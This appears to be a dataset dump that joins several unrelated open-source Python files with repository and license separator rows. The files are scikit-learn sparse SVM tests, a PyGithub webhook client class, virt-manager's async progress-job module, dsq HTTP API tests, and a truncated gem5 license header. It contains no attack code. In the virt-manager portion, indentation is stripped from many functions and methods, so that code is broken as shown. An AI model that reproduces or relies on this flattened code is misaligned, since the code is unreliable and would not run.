    assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
                              sparse_svm.decision_function(X_test_dense))
    assert_array_almost_equal(dense_svm.predict_proba(X_test_dense),
                              sparse_svm.predict_proba(X_test), 4)
    msg = "cannot use sparse input in 'SVC' trained on dense data"
    if sparse.isspmatrix(X_test):
        assert_raise_message(ValueError, msg, dense_svm.predict, X_test)
def test_svc():
    """Check that sparse SVC gives the same result as SVC"""
    # many class dataset:
    X_blobs, y_blobs = make_blobs(n_samples=100, centers=10, random_state=0)
    X_blobs = sparse.csr_matrix(X_blobs)
    # NOTE: this local name shadows the imported sklearn `datasets` module
    # inside this function only.
    datasets = [[X_sp, Y, T], [X2_sp, Y2, T2],
                [X_blobs[:80], y_blobs[:80], X_blobs[80:]],
                [iris.data, iris.target, iris.data]]
    kernels = ["linear", "poly", "rbf", "sigmoid"]
    for dataset in datasets:
        for kernel in kernels:
            clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
            sp_clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
            check_svm_model_equal(clf, sp_clf, *dataset)
def test_unsorted_indices():
    # test that the result with sorted and unsorted indices in csr is the same
    # we use a subset of digits as iris, blobs or make_classification didn't
    # show the problem
    digits = load_digits()
    X, y = digits.data[:50], digits.target[:50]
    X_test = sparse.csr_matrix(digits.data[50:100])
    X_sparse = sparse.csr_matrix(X)
    coef_dense = svm.SVC(kernel='linear', probability=True,
                         random_state=0).fit(X, y).coef_
    sparse_svc = svm.SVC(kernel='linear', probability=True,
                         random_state=0).fit(X_sparse, y)
    coef_sorted = sparse_svc.coef_
    # make sure dense and sparse SVM give the same result
    assert_array_almost_equal(coef_dense, coef_sorted.toarray())
    # Fancy indexing with an identity permutation keeps the data but yields
    # CSR matrices with unsorted indices (verified by the asserts below).
    X_sparse_unsorted = X_sparse[np.arange(X.shape[0])]
    X_test_unsorted = X_test[np.arange(X_test.shape[0])]
    # make sure we scramble the indices
    assert_false(X_sparse_unsorted.has_sorted_indices)
    assert_false(X_test_unsorted.has_sorted_indices)
    unsorted_svc = svm.SVC(kernel='linear', probability=True,
                           random_state=0).fit(X_sparse_unsorted, y)
    coef_unsorted = unsorted_svc.coef_
    # make sure unsorted indices give same result
    assert_array_almost_equal(coef_unsorted.toarray(), coef_sorted.toarray())
    assert_array_almost_equal(sparse_svc.predict_proba(X_test_unsorted),
                              sparse_svc.predict_proba(X_test))
def test_svc_with_custom_kernel():
    # A custom callable kernel equivalent to the linear kernel must give the
    # same predictions as the built-in 'linear' kernel on sparse input.
    # Use a named function instead of an assigned lambda (PEP 8 / E731);
    # behavior is identical.
    def kfunc(x, y):
        return safe_sparse_dot(x, y.T)
    clf_lin = svm.SVC(kernel='linear').fit(X_sp, Y)
    clf_mylin = svm.SVC(kernel=kfunc).fit(X_sp, Y)
    assert_array_equal(clf_lin.predict(X_sp), clf_mylin.predict(X_sp))
def test_svc_iris():
    # Test the sparse SVC with the iris dataset
    # (dense fit vs sparse fit must produce the same model and predictions)
    for k in ('linear', 'poly', 'rbf'):
        sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
        clf = svm.SVC(kernel=k).fit(iris.data.toarray(), iris.target)
        assert_array_almost_equal(clf.support_vectors_,
                                  sp_clf.support_vectors_.toarray())
        assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
        assert_array_almost_equal(
            clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
        if k == 'linear':
            # coef_ only exists for the linear kernel
            assert_array_almost_equal(clf.coef_, sp_clf.coef_.toarray())
def test_sparse_decision_function():
    # Test decision_function
    # Sanity check, test that decision_function implemented in python
    # returns the same as the one in libsvm
    # multi class:
    clf = svm.SVC(kernel='linear', C=0.1).fit(iris.data, iris.target)
    dec = safe_sparse_dot(iris.data, clf.coef_.T) + clf.intercept_
    assert_array_almost_equal(dec, clf.decision_function(iris.data))
    # binary:
    clf.fit(X, Y)
    dec = np.dot(X, clf.coef_.T) + clf.intercept_
    prediction = clf.predict(X)
    assert_array_almost_equal(dec.ravel(), clf.decision_function(X))
    # Use the builtin ``int`` rather than the deprecated ``np.int`` alias
    # (removed in NumPy 1.24); the resulting integer indices are identical.
    assert_array_almost_equal(
        prediction,
        clf.classes_[(clf.decision_function(X) > 0).astype(int).ravel()])
    expected = np.array([-1., -0.66, -1., 0.66, 1., 1.])
    assert_array_almost_equal(clf.decision_function(X), expected, 2)
def test_error():
    # Test that it gives proper exception on deficient input
    # impossible value of C
    assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)
    # impossible value of nu
    clf = svm.NuSVC(nu=0.0)
    assert_raises(ValueError, clf.fit, X_sp, Y)
    # NOTE: this local Y2 shadows the module-level Y2 fixture in this test.
    Y2 = Y[:-1] # wrong dimensions for labels
    assert_raises(ValueError, clf.fit, X_sp, Y2)
    # A well-formed fit must still succeed and predict correctly.
    clf = svm.SVC()
    clf.fit(X_sp, Y)
    assert_array_equal(clf.predict(T), true_result)
def test_linearsvc():
    # Similar to test_SVC: dense vs sparse LinearSVC must agree (to 4
    # decimals -- liblinear is not exactly deterministic across formats).
    clf = svm.LinearSVC(random_state=0).fit(X, Y)
    sp_clf = svm.LinearSVC(random_state=0).fit(X_sp, Y)
    assert_true(sp_clf.fit_intercept)
    assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
    assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
    assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
    # Refit on the second fixture and re-check.
    clf.fit(X2, Y2)
    sp_clf.fit(X2_sp, Y2)
    assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
    assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
def test_linearsvc_iris():
    # Test the sparse LinearSVC with the iris dataset
    sp_clf = svm.LinearSVC(random_state=0).fit(iris.data, iris.target)
    clf = svm.LinearSVC(random_state=0).fit(iris.data.toarray(), iris.target)
    assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
    assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=1)
    assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=1)
    assert_array_almost_equal(
        clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
    # check decision_function
    pred = np.argmax(sp_clf.decision_function(iris.data), 1)
    assert_array_almost_equal(pred, clf.predict(iris.data.toarray()))
    # sparsify the coefficients on both models and check that they still
    # produce the same results
    clf.sparsify()
    assert_array_equal(pred, clf.predict(iris.data))
    sp_clf.sparsify()
    assert_array_equal(pred, sp_clf.predict(iris.data))
def test_weight():
    # Test class weights: up-weighting the minority class (0) must yield a
    # reasonable number of correct predictions on the held-out tail.
    X_, y_ = make_classification(n_samples=200, n_features=100,
                                 weights=[0.833, 0.167], random_state=0)
    X_ = sparse.csr_matrix(X_)
    for clf in (linear_model.LogisticRegression(),
                svm.LinearSVC(random_state=0),
                svm.SVC()):
        clf.set_params(class_weight={0: 5})
        clf.fit(X_[:180], y_[:180])
        y_pred = clf.predict(X_[180:])
        assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
    # Test weights on individual samples: heavily up-weighting the class-2
    # samples flips the prediction for point X[2].
    clf = svm.SVC()
    clf.fit(X_sp, Y)
    assert_array_equal(clf.predict(X[2]), [1.])
    sample_weight = [.1] * 3 + [10] * 3
    clf.fit(X_sp, Y, sample_weight=sample_weight)
    assert_array_equal(clf.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
    # Test that sparse liblinear honours intercept_scaling param
    # (reuses the dense test, parameterized with LinearSVC).
    test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
    # Test on a subset from the 20newsgroups dataset.
    # This catches some bugs if input is not correctly converted into
    # sparse format or weights are not correctly initialized.
    data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
    indices = np.array([6, 5, 35, 31])
    indptr = np.array(
        [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
         1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
         2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
         2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
    X = sparse.csr_matrix((data, indices, indptr))
    y = np.array(
        [1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
         0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
         0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
         3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
         0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
         3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
         1., 3.])
    # Dense fit vs COO-sparse fit must produce identical support vectors
    # and dual coefficients.
    clf = svm.SVC(kernel='linear').fit(X.toarray(), y)
    sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
    assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.toarray())
    assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
def test_sparse_svc_clone_with_callable_kernel():
    # Test that the "dense_fit" is called even though we use sparse input
    # meaning that everything works fine.
    a = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
                random_state=0)
    # Clone the estimator and fit/predict the clone on sparse input.
    b = base.clone(a)
    b.fit(X_sp, Y)
    pred = b.predict(X_sp)
    b.predict_proba(X_sp)
    # An equivalent dense callable-kernel SVC must predict the same labels.
    dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
                        probability=True, random_state=0)
    pred_dense = dense_svm.fit(X, Y).predict(X)
    assert_array_equal(pred_dense, pred)
    # b.decision_function(X_sp) # XXX : should be supported
def test_timeout():
    # With max_iter=1 the solver cannot converge and must emit a
    # ConvergenceWarning during fit.
    sp = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
                 random_state=0, max_iter=1)
    assert_warns(ConvergenceWarning, sp.fit, X_sp, Y)
def test_consistent_proba():
    # Two fits with the same random_state must give identical predict_proba
    # output, even when the solver stops early (max_iter=1).
    a = svm.SVC(probability=True, max_iter=1, random_state=0)
    proba_1 = a.fit(X, Y).predict_proba(X)
    a = svm.SVC(probability=True, max_iter=1, random_state=0)
    proba_2 = a.fit(X, Y).predict_proba(X)
    assert_array_almost_equal(proba_1, proba_2)
| bsd-3-clause |
mcus/SickRage | lib/github/Hook.py | 72 | 8198 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.HookResponse
class Hook(github.GithubObject.CompletableGithubObject):
    """
    This class represents Hooks as returned for example by http://developer.github.com/v3/repos/hooks

    Attributes are fetched lazily: each property calls _completeIfNotSet,
    which (in the base class) loads the full object from the API the first
    time an unset attribute is read.  This is a Python-2 era codebase --
    string checks accept both ``str`` and ``unicode``.
    """
    @property
    def active(self):
        """
        :type: bool
        """
        self._completeIfNotSet(self._active)
        return self._active.value
    @property
    def config(self):
        """
        :type: dict
        """
        self._completeIfNotSet(self._config)
        return self._config.value
    @property
    def created_at(self):
        """
        :type: datetime.datetime
        """
        self._completeIfNotSet(self._created_at)
        return self._created_at.value
    @property
    def events(self):
        """
        :type: list of string
        """
        self._completeIfNotSet(self._events)
        return self._events.value
    @property
    def id(self):
        """
        :type: integer
        """
        self._completeIfNotSet(self._id)
        return self._id.value
    @property
    def last_response(self):
        """
        :type: :class:`github.HookResponse.HookResponse`
        """
        self._completeIfNotSet(self._last_response)
        return self._last_response.value
    @property
    def name(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._name)
        return self._name.value
    @property
    def test_url(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._test_url)
        return self._test_url.value
    @property
    def updated_at(self):
        """
        :type: datetime.datetime
        """
        self._completeIfNotSet(self._updated_at)
        return self._updated_at.value
    @property
    def url(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._url)
        return self._url.value
    def delete(self):
        """
        :calls: `DELETE /repos/:owner/:repo/hooks/:id <http://developer.github.com/v3/repos/hooks>`_
        :rtype: None
        """
        # Response headers/body are intentionally ignored; the request
        # helper is expected to raise on failure ("AndCheck").
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE",
            self.url
        )
    def edit(self, name, config, events=github.GithubObject.NotSet, add_events=github.GithubObject.NotSet, remove_events=github.GithubObject.NotSet, active=github.GithubObject.NotSet):
        """
        :calls: `PATCH /repos/:owner/:repo/hooks/:id <http://developer.github.com/v3/repos/hooks>`_
        :param name: string
        :param config: dict
        :param events: list of string
        :param add_events: list of string
        :param remove_events: list of string
        :param active: bool
        :rtype: None
        """
        assert isinstance(name, (str, unicode)), name
        assert isinstance(config, dict), config
        assert events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in events), events
        assert add_events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in add_events), add_events
        assert remove_events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in remove_events), remove_events
        assert active is github.GithubObject.NotSet or isinstance(active, bool), active
        # Only explicitly-passed optional parameters are sent to the API.
        post_parameters = {
            "name": name,
            "config": config,
        }
        if events is not github.GithubObject.NotSet:
            post_parameters["events"] = events
        if add_events is not github.GithubObject.NotSet:
            post_parameters["add_events"] = add_events
        if remove_events is not github.GithubObject.NotSet:
            post_parameters["remove_events"] = remove_events
        if active is not github.GithubObject.NotSet:
            post_parameters["active"] = active
        headers, data = self._requester.requestJsonAndCheck(
            "PATCH",
            self.url,
            input=post_parameters
        )
        # Refresh this object's attributes from the PATCH response.
        self._useAttributes(data)
    def test(self):
        """
        :calls: `POST /repos/:owner/:repo/hooks/:id/tests <http://developer.github.com/v3/repos/hooks>`_
        :rtype: None
        """
        # Fire a test delivery for this hook; response is ignored.
        headers, data = self._requester.requestJsonAndCheck(
            "POST",
            self.url + "/tests"
        )
    def _initAttributes(self):
        # All attributes start as NotSet so the properties above know to
        # lazily complete the object on first access.
        self._active = github.GithubObject.NotSet
        self._config = github.GithubObject.NotSet
        self._created_at = github.GithubObject.NotSet
        self._events = github.GithubObject.NotSet
        self._id = github.GithubObject.NotSet
        self._last_response = github.GithubObject.NotSet
        self._name = github.GithubObject.NotSet
        self._test_url = github.GithubObject.NotSet
        self._updated_at = github.GithubObject.NotSet
        self._url = github.GithubObject.NotSet
    def _useAttributes(self, attributes):
        # Populate attributes from an API JSON payload; keys absent from
        # the payload leave the corresponding attribute untouched.
        if "active" in attributes: # pragma no branch
            self._active = self._makeBoolAttribute(attributes["active"])
        if "config" in attributes: # pragma no branch
            self._config = self._makeDictAttribute(attributes["config"])
        if "created_at" in attributes: # pragma no branch
            self._created_at = self._makeDatetimeAttribute(attributes["created_at"])
        if "events" in attributes: # pragma no branch
            self._events = self._makeListOfStringsAttribute(attributes["events"])
        if "id" in attributes: # pragma no branch
            self._id = self._makeIntAttribute(attributes["id"])
        if "last_response" in attributes: # pragma no branch
            self._last_response = self._makeClassAttribute(github.HookResponse.HookResponse, attributes["last_response"])
        if "name" in attributes: # pragma no branch
            self._name = self._makeStringAttribute(attributes["name"])
        if "test_url" in attributes: # pragma no branch
            self._test_url = self._makeStringAttribute(attributes["test_url"])
        if "updated_at" in attributes: # pragma no branch
            self._updated_at = self._makeDatetimeAttribute(attributes["updated_at"])
        if "url" in attributes: # pragma no branch
            self._url = self._makeStringAttribute(attributes["url"])
| gpl-3.0 |
virt-manager/virt-manager | virtManager/asyncjob.py | 2 | 10247 | # Copyright (C) 2006, 2013 Red Hat, Inc.
# Copyright (C) 2006 Hugh O. Brock <hbrock@redhat.com>
#
# This work is licensed under the GNU GPLv2 or later.
# See the COPYING file in the top-level directory.
import threading
import traceback
from gi.repository import Gdk
from gi.repository import GLib
import libvirt
import virtinst.progress
from .baseclass import vmmGObjectUI
class _vmmMeter(virtinst.progress.Meter):
    """Progress meter that forwards updates into the async job dialog's
    progress-bar callbacks instead of printing to a terminal.

    NOTE(review): _size, _text, _total_read and _meter are presumably
    provided by the virtinst.progress.Meter base class -- confirm there.
    """
    def __init__(self, pbar_pulse, pbar_fraction, pbar_done):
        virtinst.progress.Meter.__init__(self, quiet=True)
        # Callbacks supplied by vmmAsyncJob for the three bar states.
        self._pbar_pulse = pbar_pulse
        self._pbar_fraction = pbar_fraction
        self._pbar_done = pbar_done
    #################
    # Internal APIs #
    #################
    def _write(self):
        # Unknown total size -> indeterminate pulse; otherwise report the
        # fraction read plus a "NN% <bytes>B <eta> ETA" status string.
        if self._size is None:
            self._pbar_pulse("", self._text)
        else:
            fread = virtinst.progress.Meter.format_number(self._total_read)
            rtime = virtinst.progress.Meter.format_time(
                self._meter.re.remaining_time(), True)
            frac = self._meter.re.fraction_read()
            out = "%3i%% %5sB %s ETA" % (frac * 100, fread, rtime)
            self._pbar_fraction(frac, out, self._text)
    #############################################
    # Public APIs specific to virt-manager code #
    #############################################
    def is_started(self):
        # True once start() has recorded a start time.
        return bool(self._meter.start_time)
    ###################
    # Meter overrides #
    ###################
    def start(self, *args, **kwargs):
        super().start(*args, **kwargs)
        self._write()
    def update(self, *args, **kwargs):
        super().update(*args, **kwargs)
        self._write()
    def end(self, *args, **kwargs):
        super().end(*args, **kwargs)
        self._pbar_done()
def cb_wrapper(callback, asyncjob, *args, **kwargs):
    """Entry point for the background thread: run *callback*, capturing
    any exception into *asyncjob* so the UI thread can report it later.
    The broad Exception catch is deliberate -- the thread must never die
    with an unreported error."""
    try:
        callback(asyncjob, *args, **kwargs)
    except Exception as e:
        # If job is cancelled, don't report error to user.
        if (isinstance(e, libvirt.libvirtError) and
            asyncjob.can_cancel() and
            asyncjob.job_canceled):
            return # pragma: no cover
        asyncjob.set_error(str(e), "".join(traceback.format_exc()))
def _simple_async_done_cb(error, details,
parent, errorintro, errorcb, finish_cb):
if error:
if errorcb:
errorcb(error, details)
else:
error = errorintro + ": " + error
parent.err.show_err(error,
details=details)
if finish_cb:
finish_cb()
def _simple_async(callback, args, parent, title, text, errorintro,
                  show_progress, simplecb, errorcb, finish_cb):
    """
    Build and run a vmmAsyncJob around *callback*.

    @show_progress: Whether to actually show a progress dialog
    @simplecb: If true, build a callback wrapper that ignores the asyncjob
        param that's passed to every cb by default
    """
    docb = callback
    if simplecb:
        # Wrapper that drops the leading asyncjob argument before calling
        # the user's callback.
        def tmpcb(job, *args, **kwargs):
            ignore = job
            callback(*args, **kwargs)
        docb = tmpcb
    # Completion is routed through _simple_async_done_cb with the
    # error-reporting context bundled as its extra arguments.
    asyncjob = vmmAsyncJob(docb, args,
                           _simple_async_done_cb,
                           (parent, errorintro, errorcb, finish_cb),
                           title, text, parent.topwin,
                           show_progress=show_progress)
    asyncjob.run()
def idle_wrapper(fn):
    # Decorator: rather than invoking fn directly, schedule it on the
    # object's idle_add() (GLib main loop) and return whatever that returns.
    def _scheduled(self, *args, **kwargs):
        return self.idle_add(fn, self, *args, **kwargs)
    return _scheduled
class vmmAsyncJob(vmmGObjectUI):
"""
Displays a progress bar while executing the "callback" method.
"""
    @staticmethod
    def simple_async(callback, args, parent, title, text, errorintro,
                     simplecb=True, errorcb=None, finish_cb=None):
        # Convenience wrapper: run callback in an async job WITH a
        # visible progress dialog.
        _simple_async(callback, args, parent,
                      title, text, errorintro, True,
                      simplecb, errorcb, finish_cb)
    @staticmethod
    def simple_async_noshow(callback, args, parent, errorintro,
                            simplecb=True, errorcb=None, finish_cb=None):
        # Convenience wrapper: run callback in an async job WITHOUT a
        # progress dialog (empty title/text, show_progress=False).
        _simple_async(callback, args, parent,
                      "", "", errorintro, False,
                      simplecb, errorcb, finish_cb)
def __init__(self,
callback, args, finish_cb, finish_args,
title, text, parent,
show_progress=True, cancel_cb=None):
"""
@show_progress: If False, don't actually show a progress dialog
@cancel_cb: Cancel callback if operation supports it.
(cb, arg1, arg2, ...)
"""
vmmGObjectUI.__init__(self, "asyncjob.ui", "vmm-progress")
self.topwin.set_transient_for(parent)
self.show_progress = bool(show_progress)
cancel_cb = cancel_cb or (None, [])
self.cancel_cb = cancel_cb[0]
self.cancel_args = [self] + list(cancel_cb[1:])
self.job_canceled = False
self._finish_cb = finish_cb
self._finish_args = finish_args or ()
self._timer = None
self._error_info = None
self._data = None
self._details_widget = None
self._details_update_cb = None
self._is_pulsing = True
self._meter = None
self._bg_thread = threading.Thread(target=cb_wrapper,
args=[callback, self] + args)
self._bg_thread.daemon = True
self.builder.connect_signals({
"on_async_job_cancel_clicked": self._on_cancel,
})
# UI state
self.topwin.set_title(title)
self.widget("pbar-text").set_text(text)
self.widget("cancel-async-job").set_visible(bool(self.cancel_cb))
####################
# Internal helpers #
####################
def _cleanup(self):
self._bg_thread = None
self.cancel_cb = None
self.cancel_args = None
self._meter = None
def _set_stage_text(self, text, canceling=False):
# This should be thread safe, since it's only ever called from
# pbar idle callbacks and cancel routine which is invoked from the
# main thread
if self.job_canceled and not canceling:
return # pragma: no cover
self.widget("pbar-stage").set_text(text)
################
# UI listeners #
################
def _on_cancel(self, ignore1=None, ignore2=None):
if not self.cancel_cb or not self._bg_thread.is_alive():
return # pragma: no cover
self.cancel_cb(*self.cancel_args)
if self.job_canceled: # pragma: no cover
self.widget("warning-box").hide()
self._set_stage_text(_("Cancelling job..."), canceling=True)
##############
# Public API #
##############
def get_meter(self):
if not self._meter:
self._meter = _vmmMeter(self._pbar_pulse,
self._pbar_fraction,
self._pbar_done)
return self._meter
def set_error(self, error, details):
self._error_info = (error, details)
def has_error(self):
return bool(self._error_info)
def can_cancel(self):
return bool(self.cancel_cb)
def show_warning(self, summary):
# This should only be called from cancel callbacks, not a the thread
markup = "<small>%s</small>" % summary
self.widget("warning-box").show()
self.widget("warning-text").set_markup(markup)
def _thread_finished(self):
GLib.source_remove(self._timer)
self.topwin.destroy()
self.cleanup()
error = None
details = None
if self._error_info:
# pylint: disable=unpacking-non-sequence
error, details = self._error_info
self._finish_cb(error, details, *self._finish_args)
def run(self):
self._timer = GLib.timeout_add(100, self._exit_if_necessary)
if self.show_progress:
self.topwin.present()
if not self.cancel_cb and self.show_progress:
gdk_window = self.topwin.get_window()
gdk_window.set_cursor(
Gdk.Cursor.new_from_name(gdk_window.get_display(), "progress"))
self._bg_thread.start()
####################################################################
# All functions after this point are called from the timer loop or #
# the worker thread, so anything that touches Gtk needs to be #
# dispatches with idle_add #
####################################################################
def _exit_if_necessary(self):
if not self._bg_thread.is_alive():
self._thread_finished()
return False
if not self._is_pulsing or not self.show_progress:
return True
self._pbar_do_pulse()
return True
@idle_wrapper
def _pbar_do_pulse(self):
if not self.builder:
return # pragma: no cover
self.widget("pbar").pulse()
@idle_wrapper
def _pbar_pulse(self, progress="", stage=None):
self._is_pulsing = True
if not self.builder:
return # pragma: no cover
self.widget("pbar").set_text(progress)
self._set_stage_text(stage or _("Processing..."))
@idle_wrapper
def _pbar_fraction(self, frac, progress, stage=None):
self._is_pulsing = False
if not self.builder:
return # pragma: no cover
self._set_stage_text(stage or _("Processing..."))
self.widget("pbar").set_text(progress)
frac = min(frac, 1)
frac = max(frac, 0)
self.widget("pbar").set_fraction(frac)
@idle_wrapper
def _pbar_done(self):
self._is_pulsing = False
@idle_wrapper
def details_enable(self):
from gi.repository import Vte
self._details_widget = Vte.Terminal()
self.widget("details-box").add(self._details_widget)
self._details_widget.set_visible(True)
self.widget("details").set_visible(True)
@idle_wrapper
def details_update(self, data):
self._details_widget.feed(data.replace("\n", "\r\n").encode())
| gpl-2.0 |
baverman/dsq | tests/test_http.py | 1 | 3886 | import redis
import msgpack
import json
import pytest
from webob import Request
from dsq.store import QueueStore, ResultStore
from dsq.manager import Manager
from dsq.http import Application
from dsq.compat import bytestr
@pytest.fixture
def app(request):
    """Return a DSQ HTTP Application backed by a freshly flushed local redis."""
    client = redis.StrictRedis()
    client.flushdb()
    manager = Manager(QueueStore(client), ResultStore(client))
    return Application(manager)
def test_json_404(app):
    # Unknown paths must produce a structured JSON error by default.
    response = Request.blank('/not-found').get_response(app)
    assert response.status_code == 404
    assert response.json == {'error': 'not-found', 'message': 'Not found'}
def test_msgpack_404(app):
    # With an msgpack Accept header the error body is msgpack-encoded.
    headers = {'Accept': 'application/x-msgpack'}
    response = Request.blank('/not-found', headers=headers).get_response(app)
    assert response.status_code == 404
    payload = msgpack.loads(response.body, encoding='utf-8')
    assert payload == {'error': 'not-found', 'message': 'Not found'}
def test_invalid_content_type(app):
    # A POST without a json/msgpack content type is rejected up front.
    request = Request.blank('/push')
    request.method = 'POST'
    request.body = b'garbage'
    response = request.get_response(app)
    assert response.status_code == 400
    expected = {'message': 'Content must be json or msgpack',
                'error': 'invalid-content-type'}
    assert response.json == expected
def test_json_invalid_payload(app):
    # Truncated JSON must yield a decode error, not a 500.
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/json'
    request.body = b'"dddd'
    response = request.get_response(app)
    assert response.status_code == 400
    assert response.json == {'error': 'invalid-encoding',
                             'message': 'Can\'t decode body'}
def test_msgpack_invalid_payload(app):
    # Bytes that aren't valid msgpack must yield a decode error, not a 500.
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/x-msgpack'
    request.body = b'"dddd'
    response = request.get_response(app)
    assert response.status_code == 400
    assert response.json == {'error': 'invalid-encoding',
                             'message': 'Can\'t decode body'}
def test_json_push(app):
    # A well-formed JSON push lands the task on the named queue.
    payload = {'queue': 'normal', 'name': 'boo', 'args': [1, 2, 3]}
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/json'
    request.body = bytestr(json.dumps(payload))
    response = request.get_response(app)
    assert response.status_code == 200
    assert app.manager.queue.get_queue('normal')
def test_msgpack_push(app):
    # A well-formed msgpack push lands the task on the named queue.
    req = Request.blank('/push')
    req.method = 'POST'
    req.content_type = 'application/x-msgpack'
    req.body = msgpack.dumps({'queue': 'normal', 'name': 'boo', 'args': [1, 2, 3]})
    res = req.get_response(app)
    # Mirror test_json_push: assert the endpoint answered 200 before
    # inspecting the queue (previously `res` was assigned but unused).
    assert res.status_code == 200
    assert app.manager.queue.get_queue('normal')
def test_task_without_queue(app):
    # Omitting the queue field is a client error.
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/json'
    request.body = bytestr(json.dumps({'name': 'boo', 'args': [1, 2, 3]}))
    response = request.get_response(app)
    assert response.status_code == 400
    assert response.json == {'error': 'bad-params', 'message': 'queue required'}
def test_task_without_name(app):
    # Omitting the task name is a client error.
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/json'
    request.body = bytestr(json.dumps({'queue': 'boo'}))
    response = request.get_response(app)
    assert response.status_code == 400
    assert response.json == {'error': 'bad-params', 'message': 'name required'}
def test_result_get(app):
    # Push a task that keeps its result, then poll /result before and
    # after the worker processes it.
    @app.manager.task
    def add(a, b):
        return a + b

    payload = {'queue': 'boo', 'name': 'add',
               'args': (1, 2), 'keep_result': 100}
    request = Request.blank('/push')
    request.method = 'POST'
    request.content_type = 'application/json'
    request.body = bytestr(json.dumps(payload))
    tid = request.get_response(app).json['id']

    result_url = '/result?id={}'.format(tid)
    assert Request.blank(result_url).get_response(app).json == None
    app.manager.process(app.manager.pop(['boo'], 1))
    assert Request.blank(result_url).get_response(app).json == {'result': 3}
def test_get_without_id(app):
    # /result requires an id query parameter.
    response = Request.blank('/result').get_response(app)
    assert response.status_code == 400
    assert response.json == {'error': 'bad-params', 'message': 'id required'}
| mit |
aferr/LatticeMemCtl | src/mem/CommMonitor.py | 17 | 5021 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
